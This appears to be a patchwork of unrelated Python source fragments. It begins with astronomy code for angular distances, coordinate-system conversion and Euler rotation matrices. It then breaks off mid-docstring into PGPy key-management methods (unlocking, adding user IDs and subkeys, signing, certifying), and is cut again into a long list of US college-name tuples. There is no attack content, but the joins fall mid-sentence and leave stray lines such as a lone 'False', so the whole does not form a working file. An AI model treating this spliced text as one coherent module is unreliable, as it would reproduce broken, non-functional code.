vec2 = dir2vec(dir2, lonlat=lonlat2)
else:
vec2 = np.reshape(dir2, (3, -1))
vec2 = normalize_vec(vec2)
elif dir2.ndim == 1:
if dir2.shape[0] == 2: # theta, phi -> vec
vec2 = np.reshape(dir2vec(dir2, lonlat=lonlat2), (3, 1))
else:
vec2 = np.reshape(dir2, (3, 1))
vec2 = normalize_vec(vec2)
# compute vec product
vec_prod = np.sqrt((np.cross(vec1.T, vec2.T) ** 2).sum(axis=1))
# compute scalar product
scal_prod = (vec1 * vec2).sum(axis=0)
return np.arctan2(vec_prod, scal_prod)
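# Illustrative usage sketch (not part of the original module): the same pair of
# directions, given once as colatitude/longitude in radians and once as
# longitude/latitude in degrees, should yield the same separation of pi/2.
def _angdist_example():
    a = angdist([np.pi / 2, 0.0], [np.pi / 2, np.pi / 2])  # radians
    b = angdist([0.0, 0.0], [90.0, 0.0], lonlat=True)      # degrees
    assert np.allclose(a, np.pi / 2) and np.allclose(b, np.pi / 2)
    return a, b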
def normalize_vec(vec):
"""Normalize the vector(s) *vec* (in-place if it is a ndarray).
Parameters
----------
vec : float, array-like of shape (D,) or (D, N)
The D-vector(s) to normalize.
Returns
-------
vec_normed : float, array
Normalized vec, shape (D,) or (D, N)
"""
vec = np.array(vec, np.float64)
r = np.sqrt(np.sum(vec ** 2, axis=0))
vec /= r
return vec
#######################################################
#
# Manage the coord system conventions
#
def check_coord(c):
"""Check if parameter is a valid coord system.
Raise a TypeError exception if it is not, otherwise returns the normalized
coordinate system name.
"""
if c is None:
return c
if not isinstance(c, six.string_types):
raise TypeError(
"Coordinate must be a string (G[alactic],"
" E[cliptic], C[elestial]"
" or Equatorial=Celestial)"
)
if c[0].upper() == "G":
x = "G"
elif c[0].upper() == "E" and c != "Equatorial":
x = "E"
elif c[0].upper() == "C" or c == "Equatorial":
x = "C"
else:
raise ValueError(
"Wrong coordinate (either G[alactic],"
" E[cliptic], C[elestial]"
" or Equatorial=Celestial)"
)
return x
def normalise_coord(coord):
"""Normalise the coord argument.
Coord sys are either 'E','G', 'C' or 'X' if undefined.
Input: either a string or a sequence of string.
Output: a tuple of two strings, each being one of the norm coord sys name
above.
eg, 'E' -> ['E','E'], ['Ecliptic','G'] -> ['E','G']
None -> ['X','X'] etc.
"""
coord_norm = []
if coord is None:
coord = (None, None)
coord = tuple(coord)
if len(coord) > 2:
raise TypeError(
"Coordinate must be a string (G[alactic],"
" E[cliptic] or C[elestial])"
" or a sequence of 2 strings"
)
for x in coord:
coord_norm.append(check_coord(x))
if len(coord_norm) < 2:
coord_norm.append(coord_norm[0])
return tuple(coord_norm)
def normalise_rot(rot, deg=False):
"""Return rot possibly completed with zeroes to reach size 3.
If rot is None, return a vector of 0.
If deg is True, convert from degree to radian, otherwise assume input
is in radian.
"""
if deg:
convert = np.pi / 180.0
else:
convert = 1.0
if rot is None:
rot = np.zeros(3)
else:
rot = np.array(rot, np.float64).flatten() * convert
rot.resize(3, refcheck=False)
return rot
def get_rotation_matrix(rot, deg=False, eulertype="ZYX"):
"""Return the rotation matrix corresponding to angles given in rot.
Usage: matrot,do_rot,normrot = get_rotation_matrix(rot)
Input:
- rot: either None, an angle or a tuple of 1,2 or 3 angles
corresponding to Euler angles.
Output:
- matrot: 3x3 rotation matrix
- do_rot: True if rotation is not identity, False otherwise
- normrot: the normalized version of the input rot.
"""
rot = normalise_rot(rot, deg=deg)
if not np.allclose(rot, np.zeros(3), rtol=0.0, atol=1.0e-15):
do_rot = True
else:
do_rot = False
if eulertype == "X":
matrot = euler_matrix_new(rot[0], -rot[1], rot[2], X=True)
elif eulertype == "Y":
matrot = euler_matrix_new(rot[0], -rot[1], rot[2], Y=True)
else:
matrot = euler_matrix_new(rot[0], -rot[1], rot[2], ZYX=True)
return matrot, do_rot, rot
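# Illustrative usage sketch (not part of the original module): a single Euler
# angle of 90 degrees produces a non-identity matrix that rotates the x axis
# within the x-y plane (the exact sign depends on euler_matrix_new's convention).
def _get_rotation_matrix_example():
    matrot, do_rot, normrot = get_rotation_matrix((90.0,), deg=True)
    assert do_rot and np.allclose(normrot, [np.pi / 2, 0.0, 0.0])
    return np.dot(matrot, np.array([1.0, 0.0, 0.0]))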
def get_coordconv_matrix(coord):
"""Return the rotation matrix corresponding to coord systems given
in coord.
Usage: matconv,do_conv,normcoord = get_coordconv_matrix(coord)
Input:
- coord: a tuple with initial and final coord systems.
See normalise_coord.
Output:
- matconv: the euler matrix for coord sys conversion
- do_conv: True if matconv is not identity, False otherwise
- normcoord: the tuple of initial and final coord sys.
History: adapted from CGIS IDL library.
"""
coord_norm = normalise_coord(coord)
if coord_norm[0] == coord_norm[1]:
matconv = np.identity(3)
do_conv = False
else:
eps = 23.452294 - 0.0130125 - 1.63889e-6 + 5.02778e-7
eps = eps * np.pi / 180.0
# ecliptic to galactic
e2g = np.array(
[
[-0.054882486, -0.993821033, -0.096476249],
[0.494116468, -0.110993846, 0.862281440],
[-0.867661702, -0.000346354, 0.497154957],
]
)
# ecliptic to equatorial
e2q = np.array(
[
[1.0, 0.0, 0.0],
[0.0, np.cos(eps), -1.0 * np.sin(eps)],
[0.0, np.sin(eps), np.cos(eps)],
]
)
# galactic to ecliptic
g2e = np.linalg.inv(e2g)
# galactic to equatorial
g2q = np.dot(e2q, g2e)
# equatorial to ecliptic
q2e = np.linalg.inv(e2q)
# equatorial to galactic
q2g = np.dot(e2g, q2e)
if coord_norm == ("E", "G"):
matconv = e2g
elif coord_norm == ("G", "E"):
matconv = g2e
elif coord_norm == ("E", "C"):
matconv = e2q
elif coord_norm == ("C", "E"):
matconv = q2e
elif coord_norm == ("C", "G"):
matconv = q2g
elif coord_norm == ("G", "C"):
matconv = g2q
else:
raise ValueError("Wrong coord transform :", coord_norm)
do_conv = True
return matconv, do_conv, coord_norm
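# Illustrative usage sketch (not part of the original module): fetch the
# Galactic-to-Celestial matrix and apply it to the Galactic +z axis.
def _coordconv_example():
    matconv, do_conv, normcoord = get_coordconv_matrix(("G", "C"))
    assert do_conv and normcoord == ("G", "C")
    gal_pole = np.array([0.0, 0.0, 1.0])  # +z axis in Galactic coordinates
    return np.dot(matconv, gal_pole)      # the same direction in Celestial coordinates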
###################################################
## ##
## euler functions ##
## ##
###### #######
def euler(ai, bi, select, FK4=0):
"""
NAME:
euler
PURPOSE:
Transform between Galactic, celestial, and ecliptic coordinates.
EXPLANATION:
Use the procedure ASTRO to use this routine interactively
CALLING SEQUENCE:
EULER, AI, BI, AO, BO, [ SELECT, /FK4, SELECT = ]
INPUTS:
AI - Input Longitude in DEGREES, scalar or vector. If only two
parameters are supplied, then AI and BI will be modified
to contain the output longitude and latitude.
BI - Input Latitude in DEGREES
OPTIONAL INPUT:
SELECT - Integer (1-6) specifying type of coordinate
transformation.
SELECT From To | SELECT From To
1 RA-Dec (2000) Galactic | 4 Ecliptic RA-Dec
2 Galactic RA-DEC | 5 Ecliptic Galactic
3 RA-Dec Ecliptic | 6 Galactic Ecliptic
If not supplied as a parameter or keyword, then EULER will prompt
for the value of SELECT
Celestial coordinates (RA, Dec) should be given in equinox J2000
unless the /FK4 keyword is set.
OUTPUTS:
AO - Output Longitude in DEGREES
BO - Output Latitude in DEGREES
INPUT KEYWORD:
/FK4 - If this keyword is set and non-zero, then input and output
celestial and ecliptic coordinates should be given in
equinox B1950.
/SELECT - The coordinate conversion integer (1-6) may
alternatively be specified as a keyword
NOTES:
EULER was changed in December 1998 to use J2000 coordinates
False
# privkey.sign("some text") <- this would raise an exception
with privkey.unlock("TheCorrectPassphrase"):
# privkey is now unlocked
assert privkey.is_unlocked
# so you can do things with it
sig = privkey.sign("some text")
# privkey is no longer unlocked
assert privkey.is_unlocked is False
Emits a :py:obj:`~warnings.UserWarning` if the key is public or not passphrase protected.
:param passphrase: The passphrase to be used to unlock this key.
:type passphrase: ``str``
:raises: :py:exc:`~pgpy.errors.PGPDecryptionError` if the passphrase is incorrect
"""
if self.is_public:
# we can't unprotect public keys because only private key material is ever protected
warnings.warn("Public keys cannot be passphrase-protected", stacklevel=3)
yield self
return
if not self.is_protected:
# we can't unprotect private keys that are not protected, because there is no ciphertext to decrypt
warnings.warn("This key is not protected with a passphrase", stacklevel=3)
yield self
return
try:
for sk in itertools.chain([self], self.subkeys.values()):
sk._key.unprotect(passphrase)
del passphrase
yield self
finally:
# clean up here by deleting the previously decrypted secret key material
for sk in itertools.chain([self], self.subkeys.values()):
sk._key.keymaterial.clear()
def add_uid(self, uid, selfsign=True, **prefs):
"""
Add a User ID to this key.
:param uid: The user id to add
:type uid: :py:obj:`~pgpy.PGPUID`
:param selfsign: Whether or not to self-sign the user id before adding it
:type selfsign: ``bool``
Valid optional keyword arguments are identical to those of self-signatures for :py:meth:`PGPKey.certify`.
Any such keyword arguments are ignored if selfsign is ``False``
"""
uid._parent = self
if selfsign:
uid |= self.certify(uid, SignatureType.Positive_Cert, **prefs)
self |= uid
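# Illustrative usage sketch (not part of the original source), using the public
# PGPy API as documented; the variable names are hypothetical:
#   uid = PGPUID.new('Example User', email='user@example.com')
#   key.add_uid(uid,
#               usage={KeyFlags.Sign, KeyFlags.EncryptCommunications},
#               hashes=[HashAlgorithm.SHA256],
#               ciphers=[SymmetricKeyAlgorithm.AES256])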
def get_uid(self, search):
"""
Find and return a User ID that matches the search string given.
:param search: A text string to match name, comment, or email address against
:type search: ``str``, ``unicode``
:return: The first matching :py:obj:`~pgpy.PGPUID`, or ``None`` if no matches were found.
"""
if self.is_primary:
return next((u for u in self._uids if search in filter(lambda a: a is not None, (u.name, u.comment, u.email))), None)
return self.parent.get_uid(search)
def del_uid(self, search):
"""
Find and remove a user id that matches the search string given. This method does not modify the corresponding
:py:obj:`~pgpy.PGPUID` object; it only removes it from the list of user ids on the key.
:param search: A text string to match name, comment, or email address against
:type search: ``str``, ``unicode``
"""
u = self.get_uid(search)
if u is None:
raise KeyError("uid '{:s}' not found".format(search))
u._parent = None
self._uids.remove(u)
def add_subkey(self, key, **prefs):
"""
Add a key as a subkey to this key.
:param key: A private :py:obj:`~pgpy.PGPKey` that does not have any subkeys of its own
:keyword usage: A ``set`` of key usage flags, as :py:obj:`~constants.KeyFlags` for the subkey to be added.
:type usage: ``set``
Other valid optional keyword arguments are identical to those of self-signatures for :py:meth:`PGPKey.certify`
"""
if self.is_public:
raise PGPError("Cannot add a subkey to a public key. Add the subkey to the private component first!")
if key.is_public:
raise PGPError("Cannot add a public key as a subkey to this key")
if key.is_primary:
if len(key._children) > 0:
raise PGPError("Cannot add a key that already has subkeys as a subkey!")
# convert key into a subkey
npk = PrivSubKeyV4()
npk.pkalg = key._key.pkalg
npk.created = key._key.created
npk.keymaterial = key._key.keymaterial
key._key = npk
key._key.update_hlen()
self._children[key.fingerprint.keyid] = key
key._parent = self
##TODO: skip this step if the key already has a subkey binding signature
bsig = self.bind(key, **prefs)
key |= bsig
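# Illustrative usage sketch (not part of the original source), using the public
# PGPy API as documented; the variable names are hypothetical:
#   subkey = PGPKey.new(PubKeyAlgorithm.RSAEncryptOrSign, 2048)
#   primary.add_subkey(subkey, usage={KeyFlags.EncryptCommunications, KeyFlags.EncryptStorage})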
def _get_key_flags(self, user=None):
if self.is_primary:
if user is not None:
user = self.get_uid(user)
elif len(self._uids) == 0:
return {KeyFlags.Certify}
else:
user = next(iter(self.userids))
# RFC 4880 says that primary keys *must* be capable of certification
return {KeyFlags.Certify} | user.selfsig.key_flags
return next(self.self_signatures).key_flags
def _sign(self, subject, sig, **prefs):
"""
The actual signing magic happens here.
:param subject: The subject to sign
:param sig: The :py:obj:`PGPSignature` object the new signature is to be encapsulated within
:returns: ``sig``, after the signature is added to it.
"""
user = prefs.pop('user', None)
uid = None
if user is not None:
uid = self.get_uid(user)
else:
uid = next(iter(self.userids), None)
if uid is None and self.parent is not None:
uid = next(iter(self.parent.userids), None)
if sig.hash_algorithm is None:
sig._signature.halg = next((h for h in uid.selfsig.hashprefs if h.is_supported), HashAlgorithm.SHA256)
if uid is not None and sig.hash_algorithm not in uid.selfsig.hashprefs:
warnings.warn("Selected hash algorithm not in key preferences", stacklevel=4)
# signature options that can be applied at any level
expires = prefs.pop('expires', None)
notation = prefs.pop('notation', None)
revocable = prefs.pop('revocable', True)
policy_uri = prefs.pop('policy_uri', None)
intended_recipients = prefs.pop('intended_recipients', [])
for intended_recipient in intended_recipients:
if isinstance(intended_recipient, PGPKey) and isinstance(intended_recipient._key, PubKeyV4):
sig._signature.subpackets.addnew('IntendedRecipient', hashed=True, version=4,
intended_recipient=intended_recipient.fingerprint)
elif isinstance(intended_recipient, Fingerprint):
# FIXME: what if it's not a v4 fingerprint?
sig._signature.subpackets.addnew('IntendedRecipient', hashed=True, version=4,
intended_recipient=intended_recipient)
else:
warnings.warn("Intended Recipient is not a PGPKey, ignoring")
if expires is not None:
# expires should be a timedelta, so if it's a datetime, turn it into a timedelta
if isinstance(expires, datetime):
expires = expires - self.created
sig._signature.subpackets.addnew('SignatureExpirationTime', hashed=True, expires=expires)
if revocable is False:
sig._signature.subpackets.addnew('Revocable', hashed=True, bflag=revocable)
if notation is not None:
for name, value in notation.items():
# mark all notations as human readable unless value is a bytearray
flags = NotationDataFlags.HumanReadable
if isinstance(value, bytearray):
flags = 0x00
sig._signature.subpackets.addnew('NotationData', hashed=True, flags=flags, name=name, value=value)
if policy_uri is not None:
sig._signature.subpackets.addnew('Policy', hashed=True, uri=policy_uri)
if user is not None and uid is not None:
signers_uid = "{:s}".format(uid)
sig._signature.subpackets.addnew('SignersUserID', hashed=True, userid=signers_uid)
# handle an edge case for timestamp signatures vs standalone signatures
if sig.type == SignatureType.Timestamp and len(sig._signature.subpackets._hashed_sp) > 1:
sig._signature.sigtype = SignatureType.Standalone
if prefs.pop('include_issuer_fingerprint', True):
if isinstance(self._key, PrivKeyV4):
sig._signature.subpackets.addnew('IssuerFingerprint', hashed=True, _version=4, _issuer_fpr=self.fingerprint)
sigdata = sig.hashdata(subject)
h2 = sig.hash_algorithm.hasher
h2.update(sigdata)
sig._signature.hash2 = bytearray(h2.digest()[:2])
_sig = self._key.sign(sigdata, getattr(hashes, sig.hash_algorithm.name)())
if _sig is NotImplemented:
raise NotImplementedError(self.key_algorithm)
sig._signature.signature.from_signer(_sig)
sig._signature.update_hlen()
return sig
@KeyAction(KeyFlags.Sign, is_unlocked=True, is_public=False)
def sign(self, subject, **prefs):
"""
Sign text, a message, or a timestamp using this key.
:param subject: The text to be signed
:type subject: ``str``, :py:obj:`~pgpy.PGPMessage`, ``None``
:raises: :py:exc:`~pgpy.errors.PGPError` if the key is passphrase-protected and has not been unlocked
:raises: :py:exc:`~pgpy.errors.PGPError` if the key is public
:returns: :py:obj:`PGPSignature`
The following optional keyword arguments can be used with :py:meth:`PGPKey.sign`, as well as
:py:meth:`PGPKey.certify`, :py:meth:`PGPKey.revoke`, and :py:meth:`PGPKey.bind`:
:keyword expires: Set an expiration date for this signature
:type expires: :py:obj:`~datetime.datetime`, :py:obj:`~datetime.timedelta`
:keyword notation: Add arbitrary notation data to this signature.
:type notation: ``dict``
:keyword policy_uri: Add a URI to the signature that should describe the policy under which the signature
was issued.
:type policy_uri: ``str``
:keyword revocable: If ``False``, this signature will be marked non-revocable
:type revocable: ``bool``
:keyword user: Specify which User ID to use when creating this signature. Also adds a "Signer's User ID"
to the signature.
:type user: ``str``
:keyword created: Specify the time that the signature should be made. If unset or None,
it will use the present time.
:type created: :py:obj:`~datetime.datetime`
:keyword intended_recipients: Specify a list of :py:obj:`PGPKey` objects that will be encrypted to.
:type intended_recipients: ``list``
:keyword include_issuer_fingerprint: Whether to include a hashed subpacket indicating the issuer fingerprint.
(only for v4 keys, defaults to True)
:type include_issuer_fingerprint: ``bool``
"""
sig_type = SignatureType.BinaryDocument
hash_algo = prefs.pop('hash', None)
if subject is None:
sig_type = SignatureType.Timestamp
if isinstance(subject, PGPMessage):
if subject.type == 'cleartext':
sig_type = SignatureType.CanonicalDocument
subject = subject.message
sig = PGPSignature.new(sig_type, self.key_algorithm, hash_algo, self.fingerprint.keyid, created=prefs.pop('created', None))
return self._sign(subject, sig, **prefs)
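# Illustrative usage sketch (not part of the original source); the passphrase
# and message text below are hypothetical:
#   message = PGPMessage.new("some text to sign")
#   with privkey.unlock("passphrase"):
#       message |= privkey.sign(message, notation={"reviewed": "yes"})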
@KeyAction(KeyFlags.Certify, is_unlocked=True, is_public=False)
def certify(self, subject, level=SignatureType.Generic_Cert, **prefs):
"""
certify(subject, level=SignatureType.Generic_Cert, **prefs)
Sign a key or a user id within a key.
:param subject: The user id or key to be certified.
:type subject: :py:obj:`PGPKey`, :py:obj:`PGPUID`
:param level: :py:obj:`~constants.SignatureType.Generic_Cert`, :py:obj:`~constants.SignatureType.Persona_Cert`,
:py:obj:`~constants.SignatureType.Casual_Cert`, or :py:obj:`~constants.SignatureType.Positive_Cert`.
Only used if subject is a :py:obj:`PGPUID`; otherwise, it is ignored.
:raises: :py:exc:`~pgpy.errors.PGPError` if the key is passphrase-protected and has not been unlocked
:raises: :py:exc:`~pgpy.errors.PGPError` if the key is public
:returns: :py:obj:`PGPSignature`
In addition to the optional keyword arguments accepted by :py:meth:`PGPKey.sign`, the following optional
keyword arguments can be used with :py:meth:`PGPKey.certify`.
These optional keywords only make sense, and thus only have an effect, when self-signing a key or User ID:
:keyword usage: A
Francis University"),
("Saint Gregory's University","Saint Gregory's University"),
("Saint John Fisher College","Saint John Fisher College"),
("Saint John Vianney College Seminary","Saint John Vianney College Seminary"),
("Saint John's Seminary","Saint John's Seminary"),
("Saint Johns River State College","Saint Johns River State College"),
("Saint Johns University","Saint Johns University"),
("Saint Joseph Seminary College","Saint Joseph Seminary College"),
("Saint Joseph's College of Maine","Saint Joseph's College of Maine"),
("Saint Joseph's College-New York","Saint Joseph's College-New York"),
("Saint Joseph's University","Saint Joseph's University"),
("Saint Josephs College","Saint Josephs College"),
("Saint Leo University","Saint Leo University"),
("Saint Louis Christian College","Saint Louis Christian College"),
("Saint Louis Community College","Saint Louis Community College"),
("Saint Louis University","Saint Louis University"),
("Saint Luke's College of Health Sciences","Saint Luke's College of Health Sciences"),
("Saint Martin's University","Saint Martin's University"),
("Saint Mary's College of California","Saint Mary's College of California"),
("Saint Mary's College","Saint Mary's College"),
("Saint Mary's University of Minnesota","Saint Mary's University of Minnesota"),
("Saint Mary-of-the-Woods College","Saint Mary-of-the-Woods College"),
("Saint Meinrad School of Theology","Saint Meinrad School of Theology"),
("Saint Michael's College","Saint Michael's College"),
("Saint Norbert College","Saint Norbert College"),
("Saint Patrick's Seminary and University","Saint Patrick's Seminary and University"),
("Saint Paul College","Saint Paul College"),
("Saint Paul School of Theology","Saint Paul School of Theology"),
("Saint Pauls College","Saint Pauls College"),
("Saint Peter's University","Saint Peter's University"),
("Saint Vincent College","Saint Vincent College"),
("Saint Vincent Seminary","Saint Vincent Seminary"),
("Saint Vincent de Paul Regional Seminary","Saint Vincent de Paul Regional Seminary"),
("Saint Vladimirs Orthodox Theological Seminary","Saint Vladimirs Orthodox Theological Seminary"),
("Saint Xavier University","Saint Xavier University"),
("Salem College of Hairstyling","Salem College of Hairstyling"),
("Salem College","Salem College"),
("Salem Community College","Salem Community College"),
("Salem International University","Salem International University"),
("Salem State University","Salem State University"),
("Salina Area Technical College","Salina Area Technical College"),
("Salinas Beauty College Inc","Salinas Beauty College Inc"),
("Saline County Career Center","Saline County Career Center"),
("Salisbury University","Salisbury University"),
("Salish Kootenai College","Salish Kootenai College"),
("Salon & Spa Institute","Salon & Spa Institute"),
("Salon 496 Barber Academy","Salon 496 Barber Academy"),
("Salon Academy","Salon Academy"),
("Salon Professional Academy","Salon Professional Academy"),
("Salon Success Academy-Corona","Salon Success Academy-Corona"),
("Salon Success Academy-Fontana","Salon Success Academy-Fontana"),
("Salon Success Academy-Redlands","Salon Success Academy-Redlands"),
("Salon Success Academy-San Bernardino","Salon Success Academy-San Bernardino"),
("Salon Success Academy-Upland","Salon Success Academy-Upland"),
("Salt Lake Baptist College","Salt Lake Baptist College"),
("Salt Lake Community College","Salt Lake Community College"),
("Salter College-Chicopee","Salter College-Chicopee"),
("Salter College-West Boylston","Salter College-West Boylston"),
("Salter School of Nursing and Allied Health","Salter School of Nursing and Allied Health"),
("Salter School-Fall River","Salter School-Fall River"),
("Salter School-New Bedford","Salter School-New Bedford"),
("Salus University","Salus University"),
("Salve Regina University","Salve Regina University"),
("Sam Houston State University","Sam Houston State University"),
("Samaritan Hospital School of Nursing","Samaritan Hospital School of Nursing"),
("Samford University","Samford University"),
("Sampson Community College","Sampson Community College"),
("Samuel Merritt University","Samuel Merritt University"),
("San Antonio College","San Antonio College"),
("San Bernardino Community College District","San Bernardino Community College District"),
("San Bernardino Valley College","San Bernardino Valley College"),
("San Diego Christian College","San Diego Christian College"),
("San Diego City College","San Diego City College"),
("San Diego College","San Diego College"),
("San Diego Community College District-District Office","San Diego Community College District-District Office"),
("San Diego Continuing Education","San Diego Continuing Education"),
("San Diego Culinary Institute","San Diego Culinary Institute"),
("San Diego Mesa College","San Diego Mesa College"),
("San Diego Miramar College","San Diego Miramar College"),
("San Diego State University","San Diego State University"),
("San Diego State University-Imperial Valley Campus","San Diego State University-Imperial Valley Campus"),
("San Francisco Art Institute","San Francisco Art Institute"),
("San Francisco Conservatory of Music","San Francisco Conservatory of Music"),
("San Francisco Institute of Esthetics and Cosmetology","San Francisco Institute of Esthetics and Cosmetology"),
("San Francisco State University","San Francisco State University"),
("San Francisco Theological Seminary","San Francisco Theological Seminary"),
("San Jacinto Community College","San Jacinto Community College"),
("San Joaquin College of Law","San Joaquin College of Law"),
("San Joaquin Delta College","San Joaquin Delta College"),
("San Joaquin Valley College-Bakersfield","San Joaquin Valley College-Bakersfield"),
("San Joaquin Valley College-Central Administrative Office","San Joaquin Valley College-Central Administrative Office"),
("San Joaquin Valley College-Fresno Aviation","San Joaquin Valley College-Fresno Aviation"),
("San Joaquin Valley College-Fresno","San Joaquin Valley College-Fresno"),
("San Joaquin Valley College-Hesperia","San Joaquin Valley College-Hesperia"),
("San Joaquin Valley College-Lancaster","San Joaquin Valley College-Lancaster"),
("San Joaquin Valley College-Modesto","San Joaquin Valley College-Modesto"),
("San Joaquin Valley College-Ontario","San Joaquin Valley College-Ontario"),
("San Joaquin Valley College-Rancho Cordova","San Joaquin Valley College-Rancho Cordova"),
("San Joaquin Valley College-San Diego","San Joaquin Valley College-San Diego"),
("San Joaquin Valley College-Temecula","San Joaquin Valley College-Temecula"),
("San Joaquin Valley College-Visalia","San Joaquin Valley College-Visalia"),
("San Jose City College","San Jose City College"),
("San Jose State University","San Jose State University"),
("San Jose-Evergreen Community College District","San Jose-Evergreen Community College District"),
("San Juan Bautista School of Medicine","San Juan Bautista School of Medicine"),
("San Juan College","San Juan College"),
("San Mateo County Community College District Office","San Mateo County Community College District Office"),
("Sandhills Community College","Sandhills Community College"),
("Sandusky Career Center","Sandusky Career Center"),
("Sanford College of Nursing","Sanford College of Nursing"),
("Sanford Medical Center","Sanford Medical Center"),
("Sanford-Brown College-Atlanta","Sanford-Brown College-Atlanta"),
("Sanford-Brown College-Austin","Sanford-Brown College-Austin"),
("Sanford-Brown College-Boston","Sanford-Brown College-Boston"),
("Sanford-Brown College-Collinsville","Sanford-Brown College-Collinsville"),
("Sanford-Brown College-Columbus","Sanford-Brown College-Columbus"),
("Sanford-Brown College-Dallas","Sanford-Brown College-Dallas"),
("Sanford-Brown College-Dearborn","Sanford-Brown College-Dearborn"),
("Sanford-Brown College-Farmington","Sanford-Brown College-Farmington"),
("Sanford-Brown College-Fenton","Sanford-Brown College-Fenton"),
("Sanford-Brown College-Grand Rapids","Sanford-Brown College-Grand Rapids"),
("Sanford-Brown College-Hazelwood","Sanford-Brown College-Hazelwood"),
("Sanford-Brown College-Hillside","Sanford-Brown College-Hillside"),
("Sanford-Brown College-Houston North Loop","Sanford-Brown College-Houston North Loop"),
("Sanford-Brown College-Houston","Sanford-Brown College-Houston"),
("Sanford-Brown College-Indianapolis","Sanford-Brown College-Indianapolis"),
("Sanford-Brown College-Middleburg Heights","Sanford-Brown College-Middleburg Heights"),
("Sanford-Brown College-Phoenix","Sanford-Brown College-Phoenix"),
("Sanford-Brown College-Portland","Sanford-Brown College-Portland"),
("Sanford-Brown College-San Antonio","Sanford-Brown College-San Antonio"),
("Sanford-Brown College-Skokie","Sanford-Brown College-Skokie"),
("Sanford-Brown College-St Peters","Sanford-Brown College-St Peters"),
("Sanford-Brown College-Tinley Park","Sanford-Brown College-Tinley Park"),
("Sanford-Brown College-Tysons Corner","Sanford-Brown College-Tysons Corner"),
("Sanford-Brown College-West Allis","Sanford-Brown College-West Allis"),
("Sanford-Brown Institute-Cranston","Sanford-Brown Institute-Cranston"),
("Sanford-Brown Institute-Ft Lauderdale","Sanford-Brown Institute-Ft Lauderdale"),
("Sanford-Brown Institute-Garden City","Sanford-Brown Institute-Garden City"),
("Sanford-Brown Institute-Iselin","Sanford-Brown Institute-Iselin"),
("Sanford-Brown Institute-Jacksonville","Sanford-Brown Institute-Jacksonville"),
("Sanford-Brown Institute-Landover","Sanford-Brown Institute-Landover"),
("Sanford-Brown Institute-New York","Sanford-Brown Institute-New York"),
("Sanford-Brown Institute-Orlando","Sanford-Brown Institute-Orlando"),
("Sanford-Brown Institute-Pittsburgh","Sanford-Brown Institute-Pittsburgh"),
("Sanford-Brown Institute-Tampa","Sanford-Brown Institute-Tampa"),
("Sanford-Brown Institute-Trevose","Sanford-Brown Institute-Trevose"),
("Sanford-Brown Institute-White Plains","Sanford-Brown Institute-White Plains"),
("Sanford-Brown Institute-Wilkins Township","Sanford-Brown Institute-Wilkins Township"),
("Sanford-Burnham Medical Research Institute","Sanford-Burnham Medical Research Institute"),
("Santa Ana Beauty Academy","Santa Ana Beauty Academy"),
("Santa Ana Beauty College","Santa Ana Beauty College"),
("Santa Ana College","Santa Ana College"),
("Santa Barbara Business College-Bakersfield","Santa Barbara Business College-Bakersfield"),
("Santa Barbara Business College-Santa Maria","Santa Barbara Business College-Santa Maria"),
("Santa Barbara Business College-Ventura","Santa Barbara Business College-Ventura"),
("Santa Barbara City College","Santa Barbara City College"),
("Santa Clara University","Santa Clara University"),
("Santa Fe College","Santa Fe College"),
("Santa Fe Community College","Santa Fe Community College"),
("Santa Fe University of Art and Design","Santa Fe University of Art and Design"),
("Santa Monica College","Santa Monica College"),
("Santa Rosa Junior College","Santa Rosa Junior College"),
("Santiago Canyon College","Santiago Canyon College"),
("<NAME> College","Sarah Lawrence College"),
("Sarasota County Technical Institute","Sarasota County Technical Institute"),
("Sarasota School of Massage Therapy","Sarasota School of Massage Therapy"),
("Sauk Valley Community College","Sauk Valley Community College"),
("Savannah College of Art and Design","Savannah College of Art and Design"),
("Savannah Law School","Savannah Law School"),
("Savannah State University","Savannah State University"),
("Savannah Technical College","Savannah Technical College"),
("Saybrook University","Saybrook University"),
("Schenectady County Community College","Schenectady County Community College"),
("Schiller International University","Schiller International University"),
("Schilling-Douglas School of Hair Design","Schilling-Douglas School of Hair Design"),
("Scholars Cosmetology University","Scholars Cosmetology University"),
("School of Automotive Machinists","School of Automotive Machinists"),
("School of Court Reporting","School of Court Reporting"),
("School of Health","School of Health"),
("School of Missionary Aviation Technology","School of Missionary Aviation Technology"),
("School of Professional Horticulture at the New York Botanical Garden","School of Professional Horticulture at the New York Botanical Garden"),
("School of Visual Arts","School of Visual Arts"),
("School of the Art Institute of Chicago","School of the Art Institute of Chicago"),
("School of the Museum of Fine Arts-Boston","School of the Museum of Fine Arts-Boston"),
("Schoolcraft College","Schoolcraft College"),
("Schreiner University","Schreiner University"),
("Schuyler Steuben Chemung Tioga Allegany BOCES","Schuyler Steuben Chemung Tioga Allegany BOCES"),
("Schuylkill Technology Center","Schuylkill Technology Center"),
("Scioto County Career Technical Center","Scioto County Career Technical Center"),
("Scott College of Cosmetology","Scott College of Cosmetology"),
("Scottsdale Community College","Scottsdale Community College"),
("Scripps College","Scripps College"),
("Seabury-Western Theological Seminary","Seabury-Western Theological Seminary"),
("Seacoast Career School-Manchester Campus","Seacoast Career School-Manchester Campus"),
("Seacoast Career Schools-Sanford Campus","Seacoast Career Schools-Sanford Campus"),
("Searcy Beauty College Inc","Searcy Beauty College Inc"),
("Seattle Central College","Seattle Central College"),
("Seattle Community College-North Campus","Seattle Community College-North Campus"),
("Seattle Community College-South Campus","Seattle Community College-South Campus"),
("Seattle Institute of Oriental Medicine","Seattle Institute of Oriental Medicine"),
("Seattle Pacific University","Seattle Pacific University"),
("Seattle University","Seattle University"),
("Seattle Vocational Institute","Seattle Vocational Institute"),
("Sebring Career Schools-Houston","Sebring Career Schools-Houston"),
("Sebring Career Schools-Huntsville","Sebring Career Schools-Huntsville"),
("Seguin Beauty School-New Braunfels","Seguin Beauty School-New Braunfels"),
("Seguin Beauty School-Seguin","Seguin Beauty School-Seguin"),
("Selma University","Selma University"),
("<NAME>","<NAME>"),
("<NAME>","<NAME> de Puerto Rico"),
("Seminole State College of Florida","Seminole State College of Florida"),
("Seminole State College","Seminole State College"),
("Sentara College of Health Sciences","Sentara College of Health Sciences"),
("Serbias Technical College","Serbias Technical College"),
("Sessions College for Professional Design","Sessions College for Professional Design"),
("Seton Hall University","Seton Hall University"),
("Seton Hill University","Seton Hill University"),
("Sewanee-The University of the South","Sewanee-The University of the South"),
("Seward County Community College and Area Technical School","Seward County Community College and Area Technical School"),
("Seymour Beauty Academy","Seymour Beauty Academy"),
("Sh'or Yoshuv Rabbinical College","Sh'or Yoshuv Rabbinical College"),
("Sharon Regional Health System School of Nursing","Sharon Regional Health System School of Nursing"),
("Sharp Edgez Barber Institute","Sharp Edgez Barber Institute"),
